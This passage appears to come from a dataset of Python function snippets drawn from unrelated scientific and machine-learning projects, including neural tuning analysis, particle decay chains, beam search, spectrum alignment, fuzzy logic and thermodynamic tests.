tuning data.\n\t\t\t\n\t\t\tself.cond_tuning[1:-1,:] *= (1/self.bin_width)\n\t\t\t\n\t\t\t# Column labels for pd.dataframe of tuning data\n\t\t\t# ci_perc = (100 * (1 - self.parameters['fft_alpha']))\n\t\t\tidx = ['conditions', \n\t\t\t\t 'F0', 'F0_pos_CI', 'F0_neg_CI', \n\t\t\t\t 'F1', 'F1_pos_CI', 'F1_neg_CI',\n\t\t\t\t 'F2', 'F2_pos_CI', 'F2_neg_CI',\n\t\t\t\t 'F1/F0_ratio']\n\t\t\t# transpose of tuning array to data frame object \n\t\t\tself.cond_tuning_pd = pd.DataFrame(self.cond_tuning.transpose(), columns=idx)\n\t\t\n\t\t\n\t\t\t \n\t\t# for orientation data, the orientation angles can get scrambled due to the circ() function\n\t\t# rotating the angles around. This orders them numerically in the final cond_tuning\n\t\t\n\t\tif self.parameters['condition_type'] == 'orientation':\n\t\t\tself.cond_tuning = self.cond_tuning[:,self.cond_tuning[0].argsort()]\n\t\t\tself.cond_tuning_pd.sort_values(self.cond_tuning_pd.columns[0], inplace=True)\n\n\n\t\t# \n\t\t# cond_tuning cleaning up and inserting important meta data / columns\n\t\t# \n\n\t\tif biphase_select_resp is not None:\n\t\t\tassert isinstance(biphase_select_resp, int) and biphase_select_resp in [1,2], \\\n\t\t\tf'biphase_select_resp ({biphase_select_resp}) must be an integer of 1 or 2'\n\n\t\t\tassert self.parameters['biphasic'], 'Stimulus not analysed as biphasic'\n\n\t\t\t# cond tuning array\n\t\t\tcond_tuning_biphase_mask = self.cond_tuning[4,:] == biphase_select_resp\n\t\t\tself.cond_tuning = self.cond_tuning[:, cond_tuning_biphase_mask]\n\n\t\t\t# cond tuning pandas dataframe\n\t\t\tself.cond_tuning_pd = self.cond_tuning_pd.query('biphas_id == @biphase_select_resp')\n\n\n\n\t\tassert hasattr(self, 'CELL_ID'), 'Make Cell ID first'\n\n\n\t\tself.cond_tuning_pd.insert(0, 'run_key', self.RUN_KEY)\n\t\tself.cond_tuning_pd.insert(0, 'cell_key', self.CELL_KEY)\n\t\tself.cond_tuning_pd.set_index(['cell_key', 'run_key'], inplace=True)\n\n\t\tself.cond_tuning_pd.insert(0, 'cond_type', self.parameters['condition_type'])\n\t\tself.cond_tuning_pd.insert(1, 'cond_unit', self.parameters['condition_unit'])", "def analyze(self,event):\n print \"\\n%s event %s %s\"%('-'*10,event.event,'-'*68)\n self.nevents += 1\n leptonic = False\n particles = Collection(event,'GenPart')\n #particles = Collection(event,'LHEPart')\n seeds = [ ] # seeds for decay chain\n chain = { } # decay chain\n print \" \\033[4m%7s %8s %8s %8s %8s %8s %8s %8s %9s %10s \\033[0m\"%(\n \"index\",\"pdgId\",\"moth\",\"mothid\",\"dR\",\"pt\",\"eta\",\"status\",\"prompt\",\"last copy\")\n for i, particle in enumerate(particles):\n mothidx = particle.genPartIdxMother\n if 0<=mothidx<len(particles):\n moth = particles[mothidx]\n mothpid = moth.pdgId\n mothdR = min(9999,particle.DeltaR(moth)) #particle.p4().DeltaR(moth.p4())\n else:\n mothpid = -1\n mothdR = -1\n eta = max(-9999,min(9999,particle.eta))\n prompt = hasbit(particle.statusFlags,0)\n lastcopy = hasbit(particle.statusFlags,13)\n print \" %7d %8d %8d %8d %8.2f %8.2f %8.2f %8d %9s %10s\"%(\n i,particle.pdgId,mothidx,mothpid,mothdR,particle.pt,eta,particle.status,prompt,lastcopy)\n if abs(particle.pdgId) in [11,13,15]:\n leptonic = True\n if mothidx in chain: # add to decay chain\n chain[mothidx].append(i)\n chain[i] = [ ] # daughters\n elif abs(particle.pdgId) in self.seedpids: # save as decay chain seed\n seeds.append(i)\n chain[i] = [ ] # daughters\n if leptonic:\n self.nleptons += 1\n print parsechain(particles,seeds,chain) # print decay chain", "def run_test(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 
10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n for ix in range(0, num_sight_lines+1):\n # Make impact parameters covering the full\n # particle in x\n x = ix / (1. * num_sight_lines) * smoothing\n \n pencilbeams.append(\n dict(x=x, y=0),\n )\n\n results = []\n for pencilbeam in pencilbeams:\n result = testsph(h=smoothing, dim=dim, **pencilbeam)\n results.append(result)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n particle_integral = integrate.trapz([x for x in results], [x['x'] for x in pencilbeams])\n \n # \"All smoothing lengths should integrate to the same value \"\n\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n traces.append(go.Scatter(y=[x for x in results], x=[y['x'] for y in pencilbeams]))\n\n # The mass of a particle should be the area under each of these curves(?)\n plot(traces)", "def ha(sf,sfn,mX,pX,params,verbose=[],onlySelected=False,hc=-2,div=8,L=30,fs=44100,gt=[]):\r\n \r\n M,N,H,B = params\r\n \r\n idx = candidSelection(sf,t=0.025,hw=25) \r\n idx = np.concatenate((np.zeros(1),idx,np.array([sf.shape[0]])))\r\n idx_orig = idx.copy()\r\n mask = np.ones(idx.shape)\r\n mask[0]=0\r\n mask[-1]=0\r\n errors = np.zeros(mX.shape[0])\r\n scores = np.zeros(idx.shape)\r\n freqs = []\r\n \r\n tFlag = False\r\n vFlag = False # flag to enable prints and plots\r\n \r\n rms = np.sum(mX,axis=1)\r\n rms = rms-np.mean(rms)\r\n rms = rms/np.max(rms)\r\n rms = savgol_filter(rms,3,1)\r\n \r\n rms_t = -0.1\r\n \r\n # sending every onset candidate to harmonic analysis\r\n for i in range(len(idx)-2,0,-1):\r\n \r\n if onlySelected:\r\n if idx[i] not in verbose:\r\n continue\r\n \r\n b = int((idx[i]-(10240/H)) if (idx[i]>(idx[i-1]+(10240/H))) else idx[i-1])\r\n e = int((idx[i]+(10240/H)) if (idx[i]<(idx[i+1]-(10240/H))) else idx[i+1])\r\n \r\n \r\n if np.mean(rms[int(idx[i]):int(idx[i])+50])<rms_t:\r\n continue\r\n \r\n onst = int(idx[i]-b)\r\n pmX = np.copy(mX[b:e])\r\n \r\n\r\n if idx[i] in verbose:\r\n print(\"\\nOnset candidate:\")\r\n print(\"onset frame: %d\" %idx[i])\r\n print(\"sf onset number: %d\" %i)\r\n vFlag = True\r\n y = MRStftSynth(pmX,pX[b:e],M,H,B)\r\n print(\"synthesized sound\")\r\n ipd.display(ipd.Audio(data=y, rate=fs))\r\n \r\n if vFlag:\r\n print(\"STFT around candidate\")\r\n plt.pcolormesh(np.arange(pmX.shape[0]), np.arange(pmX.shape[1]), np.transpose(pmX))\r\n plt.show()\r\n \r\n print(\"filtered spectral flux\")\r\n plt.plot(sf[b:e])\r\n plt.show()\r\n print(\"raw spectral flux\")\r\n plt.plot(sfn[b:e])\r\n plt.show()\r\n \r\n allErrors,allf0s,pmXv = f0detection(pmX,pX[b:e],sfn[b:e],-100,10,onst,vFlag,hc,div,params,fs,tFlag)\r\n\r\n aL = np.min((e-idx[i]/2,L)) \r\n segments = getSegments(allf0s,allErrors,onst,pmX,vFlag)\r\n scores[i],freq,segmentScores = harmonicScore(segments,aL,vFlag,tFlag)\r\n freqs.append(freq)\r\n \r\n if scores[i]<1: # prevent rejected candidates from creating boundary for adjacent onset\r\n idx[i] = sf.shape[0]\r\n \r\n if vFlag:\r\n print(\"Score for this onset: %d\" %scores[i])\r\n \r\n if tFlag and scores[i]<1:\r\n pred_time = np.abs(idx[i]*(H/fs))\r\n closest_gt_ind = np.argmin(pred_time-gt)[0]\r\n if np.abs(gt[closest_gt_ind]-pred_time)<0.05:\r\n if score[i]>1:\r\n tp.append[idx[i]]\r\n if score[i]<1:\r\n fn.append[idx[i]]\r\n \r\n print(\"STFT around onset\")\r\n plt.pcolormesh(np.arange(pmX.shape[0]), np.arange(pmX.shape[1]), 
np.transpose(pmX))\r\n plt.show()\r\n \r\n y = MRStftSynth(pmXv,pX,M,H,B)\r\n ipd.display(ipd.Audio(data=y, rate=fs))\r\n \r\n plt.pcolormesh(np.arange(pmXv.shape[0]), np.arange(pmXv.shape[1]), np.transpose(pmXv))\r\n plt.show()\r\n\r\n vFlag = False\r\n tFlag = False\r\n \r\n avg = np.mean(scores)\r\n mask[scores<1] = 0\r\n result = idx_orig[mask==1]\r\n return idx_orig[1:-1],result,freqs,scores[1:-1]", "def inference(self):\n for m, doc in enumerate(self.docs):\n # Be careful followings are views\n # So self.hoge will be change, when changing variant\n zs_j = self.zs_m_j[m]\n zk_j = self.zk_m_j[m]\n n_m_zs = self.n_m_zs[m]\n n_m_zk = self.n_m_zk[m]\n for j, t in enumerate(doc):\n # discount for n-th word t with topic z\n zs = zs_j[j]\n zk = zk_j[j]\n n_m_zs[zs] -= 1\n n_m_zk[zs, zk] -= 1\n self.n_zk_t[zk, t] -= 1\n self.n_zk[zk] -= 1\n\n # sampling topic new_z for t\n \"\"\"\n n_s = n_m_zs + self.alphas # mth doc, S vec\n p_s = n_s / np.sum(n_s)\n n_k = n_m_zk + self.alphask # mth doc, SxK matrix\n p_k = n_k / n_s.reshape(len(n_s), 1)\n n_v = self.n_zk_t[:, t] + self.beta\n p_v = n_v / (self.n_zk + self.beta)\n\n p_zsk = p_s.reshape(len(p_s), 1) * p_k * p_v # SxK matrix\n \"\"\"\n\n p_zsk = (n_m_zk + self.alphask) * self.n_zk_t[:, t] \\\n / (np.sum(n_m_zs + self.alphas) * self.n_zk)\n\n p_zs = np.sum(p_zsk, axis=1) / np.sum(p_zsk)\n p_zk = np.sum(p_zsk, axis=0) / np.sum(p_zsk)\n\n new_zs = np.random.multinomial(1, p_zs).argmax()\n new_zk = np.random.multinomial(1, p_zk).argmax()\n\n # print(\"arg\", np.argmax(p_s), np.argmax(p_k, axis=1),\n # np.argmax(p_k, axis=0), np.argmax(p_zk))\n # print('probs', p_s, p_zs)\n # print('probk', p_k, p_zk)\n # print('old', zs, zk)\n # print('new', new_zs, new_zk)\n\n # set z the new topic and increment counters\n zs_j[j] = new_zs\n zk_j[j] = new_zk\n n_m_zs[new_zs] += 1\n n_m_zk[new_zs, new_zk] += 1\n self.n_zk_t[new_zk, t] += 1\n self.n_zk[new_zk] += 1", "def interpretingMF(self):\n self.location_is_veryLessDemand = fuzz.interp_membership(self.location, self.very_less_demand, self.demandLocation)\n self.location_is_lessDemand = fuzz.interp_membership(self.location, self.less_demand, self.demandLocation)\n self.location_is_averageDemand = fuzz.interp_membership(self.location, self.average_demand, self.demandLocation)\n self.location_is_highDemand = fuzz.interp_membership(self.location, self.high_demand, self.demandLocation)\n self.location_is_veryHighDemand = fuzz.interp_membership(self.location, self.very_high_demand, self.demandLocation)\n\n self.bed_is_less = fuzz.interp_membership(self.bedroom, self.less_bed, self.numberOfBedroom)\n self.bed_is_average = fuzz.interp_membership(self.bedroom, self.average_bed, self.numberOfBedroom)\n self.bed_is_more = fuzz.interp_membership(self.bedroom, self.more_bed, self.numberOfBedroom)\n\n self.bath_is_less = fuzz.interp_membership(self.bathroom, self.less_bath, self.numberOfBathroom)\n self.bath_is_average = fuzz.interp_membership(self.bathroom, self.average_bath, self.numberOfBathroom)\n self.bath_is_more = fuzz.interp_membership(self.bathroom, self.more_bath, self.numberOfBathroom)\n\n self.fac_is_low = fuzz.interp_membership(self.facilities, self.less_fac, self.providedFacilities)\n self.fac_is_average = fuzz.interp_membership(self.facilities, self.average_fac, self.providedFacilities)\n self.fac_is_high = fuzz.interp_membership(self.facilities, self.high_fac, self.providedFacilities)\n\n self.unfunishing = fuzz.interp_membership(self.funishing, self.unfun, self.houseFunishing)\n self.partially_funishing = 
fuzz.interp_membership(self.funishing, self.partially_fun, self.houseFunishing)\n self.fully_funishing = fuzz.interp_membership(self.funishing, self.full_fun, self.houseFunishing)\n\n self.area_is_verysmall = fuzz.interp_membership(self.areaSize, self.very_small_area, self.houseAreaSize)\n self.area_is_small = fuzz.interp_membership(self.areaSize, self.small_area, self.houseAreaSize)\n self.area_is_average = fuzz.interp_membership(self.areaSize, self.average_area, self.houseAreaSize)\n self.area_is_large = fuzz.interp_membership(self.areaSize, self.large_area, self.houseAreaSize)\n\n self.access_is_bad = fuzz.interp_membership(self.accessibility, self.bad_access, self.accessArea)\n self.access_is_average = fuzz.interp_membership(self.accessibility, self.average_access, self.accessArea)\n self.access_is_good = fuzz.interp_membership(self.accessibility, self.good_access, self.accessArea)", "def spectrum_alignment(self):\n self.diff_PROTEIN()\n \n score = [] #node->>([t][i][j])\n for t in range(self.post_modif+1):\n pos = 0 # position of peptide for converting mass\n score_ij = {0: [ float('-inf') for t in range(len(self.vector))]}\n for amino in self.peptide:\n score_j = [ float('-inf') for t in range(len(self.vector))]\n pos += PROTEIN_MASS[amino]\n score_ij[pos] = score_j\n score.append(score_ij)\n \n score[0][0][0] = 0\n # score for node(i,j,t)\n for t in range(self.post_modif+1):\n for i in sorted(score[t]):\n if i > 0: # i-self.diff[i]\n for j in range(len(self.vector)):\n temp_max = float('-inf')\n if j >= self.diff[i]:\n temp_max = score[t][i-self.diff[i]][j-self.diff[i]]\n if t > 0:\n for j_p in range(j):\n if temp_max < score[t-1][i-self.diff[i]][j_p]:\n temp_max = score[t-1][i-self.diff[i]][j_p]\n \n score[t][i][j] = self.vector[j] + temp_max\n \n # trace back --> the longest path\n max_score = float('-inf')\n layer = 0 # modify\n row = pos # mass\n column = len(self.vector)-1 # vector\n modify = []\n for t in range(self.post_modif+1):\n if max_score < score[t][pos][-1] :\n max_score = score[t][pos][-1]\n layer = t\n \n while layer > 0:\n score_temp = score[layer][row][column] - self.vector[column]\n if score_temp == score[layer][row-self.diff[row]][column-self.diff[row]]:\n column -= self.diff[row]\n row -= self.diff[row]\n else:\n for j_p in range(column-1):\n if score_temp == score[layer-1][row-self.diff[row]][j_p]:\n modify.append((row, column-row))\n row -= self.diff[row]\n column = j_p\n layer -= 1\n break\n \n\n # print out the sequence\n modify.sort()\n sequence = \"\"\n pos = 0\n i = 0\n mass = 0\n for amino in self.peptide:\n pos += PROTEIN_MASS[amino]\n sequence += str(amino)\n if pos == modify[i][0]:\n if i == 0:\n mass = modify[i][1]\n else:\n mass = modify[i][1]-modify[i-1][1]\n \n if mass > 0:\n sequence += \"(+\"+str(mass)+\")\"\n else:\n sequence += \"(\"+str(mass)+\")\"\n i += 1\n \n print sequence", "def process_pssm_data(self):\n\n self.pssm_data = self._mask_pssm(self.pssm_data,nmask=self.nmask)\n self.pssm_data = self._filter_pssm(self.pssm_data)\n self.pssm_data = self._smooth_pssm(self.pssm_data,msmooth=self.nsmooth)\n self.pssm_data = np.mean(self.pssm_data,1)", "def cvstem(self):\n if (self.iEC == \"est\") and (len(sig(self.Cfun).parameters) == 1):\n fun1 = self.Cfun\n self.Cfun = lambda x,p: fun1(x)\n if (self.iEC == \"est\") and (len(sig(self.Gw).parameters) == 1):\n fun2 = self.Gw\n self.Gw = lambda x,p: fun2(x)\n if self.iEC == \"est\":\n self.c_over = self.matrix_2bound(self.Cfun)\n self.g_over = self.matrix_2bound(self.Gw)\n if 
(len(sig(self.Bw).parameters) == 1):\n fun3 = self.Bw\n self.Bw = lambda x,p: fun3(x)\n self.b_over = self.matrix_2bound(self.Bw)\n self.linesearch()\n alp = self.alp_opt\n Nx = self.Nx\n Nsplit = 1\n Np = int(Nx/Nsplit)\n Nr = np.remainder(Nx,Nsplit)\n xpmin = np.hstack((self.xlims[0,:],self.plims[0,:]))\n xpmax = np.hstack((self.xlims[1,:],self.plims[1,:]))\n Nxp = self.n+self.n_p\n xps = np.random.uniform(xpmin,xpmax,size=(Nx,Nxp))\n xs_opt,ps_opt,_ = np.hsplit(xps,np.array([self.n,Nxp]))\n Ws_opt = []\n chi_opt = 0\n nu_opt = 0\n print(\"========================================================\")\n print(\"====== SAMPLING OF CONTRACTION METRICS BY CV-STEM ======\")\n print(\"========================================================\")\n for p in range(Np):\n if np.remainder(p,int(Np/10)) == 0:\n print(\"# sampled metrics: \",p*Nsplit,\"...\")\n xs_p = xs_opt[Nsplit*p:Nsplit*(p+1),:]\n ps_p = ps_opt[Nsplit*p:Nsplit*(p+1),:]\n self.cvstem0(xs_p,ps_p,alp)\n Ws_opt += self.Ws\n if self.nu >= nu_opt:\n nu_opt = self.nu\n if self.chi >= chi_opt:\n chi_opt = self.chi\n if Nr != 0:\n print(\"# samples metrics: \",Nx,\"...\")\n xs_p = xs_opt[Nsplit*(p+1):Nx,:]\n ps_p = ps_opt[Nsplit*(p+1):Nx,:]\n self.cvstem0(xs_p,ps_p,alp)\n Ws_opt += self.Ws\n if self.nu >= nu_opt:\n nu_opt = self.nu\n if self.chi >= chi_opt:\n chi_opt = self.chi\n self.xs_opt = xs_opt\n self.ps_opt = ps_opt\n self.Ws_opt = Ws_opt\n self.chi_opt = chi_opt\n self.nu_opt = nu_opt\n if self.iEC == \"est\":\n self.Jcv_opt = (self.d1_over*self.b_over*np.sqrt(chi_opt)\\\n +self.d2_over*self.c_over*self.g_over*nu_opt)/alp\n print(\"Optimal steady-state estimation error =\",\\\n \"{:.2f}\".format(self.Jcv_opt))\n elif self.iEC == \"con\":\n self.Jcv_opt = self.d1_over*self.b_over*np.sqrt(chi_opt)/alp\n print(\"Optimal steady-state tracking error =\",\\\n \"{:.2f}\".format(self.Jcv_opt))\n else:\n raise ValueError('Invalid iEC: iEC = \"est\" or \"con\"')\n self.M2cholM()\n path = \"models/optvals/\"+self.fname\n if os.path.exists(path) == False:\n try:\n os.makedirs(path)\n except: \n raise OSError(\"Creation of directory %s failed\" %path)\n else:\n print (\"Successfully created directory %s \" %path)\n else:\n print (\"Directory %s already exists\" %path)\n np.save(path+\"/alp_opt.npy\",alp)\n np.save(path+\"/chi_opt.npy\",self.chi_opt)\n np.save(path+\"/nu_opt.npy\",self.nu_opt)\n np.save(path+\"/Jcv_opt.npy\",self.Jcv_opt)\n print(\"========================================================\")\n print(\"==== SAMPLING OF CONTRACTION METRICS BY CV-STEM END ====\")\n print(\"========================================================\\n\\n\")\n pass", "def beam_search_step(state, logits, eos_id, beam_width, is_first_step, length_penalty):\n _, vocab_size = logits.shape\n\n bsz, beam_width = state.log_probs.shape\n onehot_eos = paddle.cast(nn.functional.one_hot(paddle.ones([1], 'int64') * eos_id, vocab_size), 'int64') #[1, V]\n\n probs = paddle.log(nn.functional.softmax(logits)) #[B*W, V]\n probs = mask_prob(probs, onehot_eos, state.finished) #[B*W, V]\n allprobs = paddle.reshape(state.log_probs, [-1, 1]) + probs #[B*W, V]\n\n not_finished = 1 - paddle.reshape(state.finished, [-1, 1]) #[B*W,1]\n not_eos = 1 - onehot_eos\n length_to_add = not_finished * not_eos #[B*W,V]\n alllen = paddle.reshape(state.lengths, [-1, 1]) + length_to_add\n\n allprobs = paddle.reshape(allprobs, [-1, beam_width * vocab_size])\n alllen = paddle.reshape(alllen, [-1, beam_width * vocab_size])\n allscore = hyp_score(allprobs, alllen, length_penalty)\n if 
is_first_step:\n allscore = paddle.reshape(allscore, [bsz, beam_width, -1])[:, 0, :] # first step only consiter beam 0\n scores, idx = paddle.topk(allscore, k=beam_width) #[B, W]\n next_beam_id = idx // vocab_size #[B, W]\n next_word_id = idx % vocab_size\n\n gather_idx = paddle.concat([paddle.nonzero(idx != -1)[:, :1], paddle.reshape(idx, [-1, 1])], 1)\n next_probs = paddle.reshape(paddle.gather_nd(allprobs, gather_idx), idx.shape)\n next_len = paddle.reshape(paddle.gather_nd(alllen, gather_idx), idx.shape)\n\n gather_idx = paddle.concat([paddle.nonzero(next_beam_id != -1)[:, :1], paddle.reshape(next_beam_id, [-1, 1])], 1)\n next_finished = paddle.reshape(paddle.gather_nd(state.finished, gather_idx),\n state.finished.shape) #[gather new beam state according to new beam id]\n\n next_finished += paddle.cast(next_word_id == eos_id, 'int64')\n next_finished = paddle.cast(next_finished > 0, 'int64')\n\n next_state = BeamSearchState(log_probs=next_probs, lengths=next_len, finished=next_finished)\n output = BeamSearchOutput(scores=scores, predicted_ids=next_word_id, beam_parent_ids=next_beam_id)\n\n return output, next_state", "def __init__(self, connection_type, steel, beam_dead_load, beam_live_load, span,\r\n left_beam=None, right_beam=None, top_column=None, bottom_column=None):\r\n self.connection_type = connection_type\r\n # The dictionary used to store the RBS dimensions\r\n self.left_RBS_dimension = {}\r\n self.right_RBS_dimension = {}\r\n # The dictionary used to store the probable moment\r\n self.moment = {}\r\n # The dictionary used to store the shear force\r\n self.shear_force = {} # keys:\r\n # A scalar used to denote the doubler plate thickness\r\n self.doubler_plate_thickness = 0\r\n # A dictionary used to store the failure mode (if any)\r\n self.is_feasible = {} # keys: 'geometry limit', 'flexural strength', 'shear strength', 'SCWB'\r\n # Define a boolean flag which denotes the overall check results (True means OK.)\r\n self.flag = None\r\n\r\n # Call methods to initialize the attributes listed above\r\n self.check_column_beam(connection_type, left_beam, right_beam, top_column, bottom_column)\r\n self.extract_reduced_beam_section(connection_type, left_beam, right_beam)\r\n self.compute_probable_moment_RBS(connection_type, steel, left_beam, right_beam)\r\n self.compute_shear_force_RBS(connection_type, beam_dead_load, beam_live_load, span, bottom_column)\r\n self.compute_probable_moment_column_face(connection_type)\r\n self.compute_plastic_moment(connection_type, steel, left_beam, right_beam)\r\n self.check_moment_column_face(connection_type)\r\n self.check_shear_strength(connection_type, beam_dead_load, beam_live_load, left_beam, right_beam)\r\n self.check_column_beam_relationships(connection_type, steel, left_beam, right_beam, top_column, bottom_column)\r\n self.determine_doubler_plate(connection_type, steel, left_beam, right_beam, bottom_column, top_column)", "def test_set_sp(self):\n s = State(substance=\"water\")\n s.sp = Q_(3028.9867985920914, \"J/(kg*K)\"), Q_(101325.0, \"Pa\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.sp[0], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.sp[1], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, 
Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore\n s.sp = Q_(8623.283568815832, \"J/(kg*K)\"), Q_(101325.0, \"Pa\")\n assert np.isclose(s.T, Q_(700.9882316847855, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.sp[0], Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.sp[1], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(3013250, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(3.189303132125469, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(3336406.139862406, \"J/kg\")) # type: ignore\n assert s.x is None", "def get_effect_size(self, summ, b, nmc=5000):\n m0b, v0b = self.DModel.models[0].predict(np.array([b])) \n m1b, v1b = self.DModel.models[1].predict(np.array([b]))\n \n d_mean_D = np.squeeze(m1b - m0b) # TODO: why was this swapped around?\n d_var_D = np.squeeze(v0b + v1b)\n d_std_D = np.sqrt(d_var_D)\n \n if d_mean_D < 0:\n pval = 1 - stats.norm.cdf(x=0, loc=d_mean_D, scale=d_std_D)\n else:\n pval = stats.norm.cdf(x=0, loc=d_mean_D, scale=d_std_D)\n \n xmin, xmax = (np.min([d_mean_D - 4*d_std_D, -0.1*d_std_D]), \n np.max([d_mean_D + 4*d_std_D, 0.1*d_std_D]))\n \n n = 300\n xrange = np.linspace(xmin, xmax, n)\n y = stats.norm.pdf(xrange, d_mean_D, d_std_D) \n \n samples = np.zeros((nmc))\n nspike = int(np.round(summ['pmp']['pmc']*nmc))\n samples[nspike:] = np.random.normal(loc=d_mean_D, \n scale=np.sqrt(d_var_D), \n size=(nmc-nspike))\n \n if not np.isscalar(b):\n d_bma = None\n else:\n \n if nspike==nmc:\n # BMA dominated by continuous model\n # Put all mass at xrange closest to b\n d_bma = np.zeros((n))\n xdelta = xrange[1] - xrange[0]\n ix = np.argmin((xrange-b)**2)\n d_bma[ix] = 1.0 / xdelta\n elif nspike==0:\n # BMA dominated by discontinuous model\n d_bma = y\n else:\n # BMA is a mixture\n kde_fit = stats.gaussian_kde(samples, \n bw_method='silverman')\n d_bma = kde_fit(xrange)\n \n return {'es_BMA': d_bma,\n 'es_Disc': y,\n 'es_disc_stats': (d_mean_D, d_std_D),\n 'pval': pval,\n 'es_range': xrange,\n 'f(b)': (m0b, m1b),\n 'es_transform': lambda z: z*d_std_D + d_mean_D}", "def calc_std_nDCG_AP_corpus_smoothing(p):\n \n# nDCG_MAP_res = base_path +\"\\\\nDCG_MAP_res\\\\\"\n measures_res = linux_base_path+ \"/measures_res\"+setup+\"/\"\n k_val = 50\n NDCG_AP_all_claims_all_param_values = read_pickle(measures_res+\"NDCG_AP_prec_at_k_all_claims_all_param_values_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:clm,alpha_f,beta_f,k_val,lambda_f val nDCG_score,AP_score\n each_params_AVGnDCG_MAP_dict = read_pickle(measures_res+\"each_params_AVGnDCG_MAP_prec_at_k_dict_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:alpha_f,beta_f,k_val,lambda_f\n nDCG_MAP_std = {} #key is a configuration quadruplet, value is the std of the measures\n \n \n \n# for k_val in top_k_docs_values:\n for alpha in range(0,11,1): #change just for test!\n for beta in range(0,10,1):\n for lambda_int in range(0,11,1):\n lambda_f = turn_to_float([lambda_int])\n (alpha_f,beta_f) = turn_to_float([alpha,beta])\n curr_AP_var = 0\n curr_nDCG_var = 0\n curr_prec_at_5_var = 0\n curr_prec_at_10_var = 0\n for clm in claim_list:\n curr_nDCG_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][0] - 
each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][0])**2\n curr_AP_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][1] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][1])**2\n curr_prec_at_5_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][2] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][2])**2\n curr_prec_at_10_var +=(NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][3] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][3])**2\n curr_nDCG_std = float(float(math.sqrt(curr_nDCG_var))/float(len(claim_list)))\n curr_AP_std = float(float(math.sqrt(curr_AP_var))/float(len(claim_list)))\n curr_prec_at_5_std = float(float(math.sqrt(curr_prec_at_5_var))/float(len(claim_list)))\n curr_prec_at_10_std =float(float(math.sqrt(curr_prec_at_10_var))/float(len(claim_list)))\n nDCG_MAP_std[alpha_f,beta_f,k_val,lambda_f] = (curr_nDCG_std,curr_AP_std,curr_prec_at_5_std,curr_prec_at_10_std)\n save_pickle(measures_res+\"nDCG_MAP_prec_at_k_std_for_each_configuration_k_top_docs_\"+str(k_val)+\"_at_\"+str(p), nDCG_MAP_std)", "def sample_beam_search(self, features, states=None):\n sampled_ids = []\n inputs = features.unsqueeze(0)\n beam_size = 5\n candidates = []\n all_candidates = []\n for i in range(30): # maximum sampling length\n if i==0:\n hiddens, states = self.lstm(inputs, states) # (batch_size, 1, hidden_size), \n outputs = self.linear(hiddens.squeeze(1)) # (batch_size, vocab_size) \n predictions = torch.topk(outputs,beam_size)\n for k in range(beam_size):\n candidates.append([predictions[1][0][k], predictions[0][0][k].cpu().data.numpy()[0] , hiddens , states]) \n else: \n all_candidates = []\n for k in range(beam_size):\n candidate = candidates[k]\n inputs = self.embed(candidate[0][len(candidate[0])-1])\n inputs = inputs.unsqueeze(0)\n # print(inputs)\n hiddens, states = self.lstm(inputs, candidate[3]) # (batch_size, 1, hidden_size), \n outputs = self.linear(hiddens.squeeze(1)) # (batch_size, vocab_size) \n predictions = torch.topk(outputs,beam_size)\n for k in range(beam_size):\n new_candidate = [torch.cat((candidate[0],predictions[1][0][k]),0),candidate[1] + predictions[0][0][k].cpu().data.numpy()[0], hiddens, states]\n all_candidates.append(new_candidate)\n ordered = sorted(all_candidates, key=lambda tup:tup[1], reverse = True)\n candidates = ordered[:beam_size]\n sampled_ids = candidates[0][0]\n return sampled_ids.squeeze()", "def calculate_averaged_properties(poly_data, bucket):\n\n locator = vtk.vtkPointLocator()\n locator.SetDataSet(poly_data)\n locator.BuildLocator()\n\n LENGTH = 0.03\n MODIFIER = 3e3\n\n volume = numpy.zeros(poly_data.GetNumberOfPoints())\n temperature = numpy.zeros(poly_data.GetNumberOfPoints())\n solid_pressure = numpy.zeros(poly_data.GetNumberOfPoints())\n velocity = numpy.zeros((poly_data.GetNumberOfPoints(), 3))\n solid_pressure_gradient = numpy.zeros((poly_data.GetNumberOfPoints(), 3))\n\n for particle in bucket:\n point_list = vtk.vtkIdList()\n locator.FindPointsWithinRadius(LENGTH, particle.pos, point_list)\n\n beta = 1.0/6.0*numpy.pi*particle.parameters.diameter**3\n\n for _ in range(point_list.GetNumberOfIds()):\n point_index = point_list.GetId(_)\n\n particle2 = bucket.particles[point_index]\n\n rad2 = distance2(particle2.pos, particle.pos)\n rad2 /= 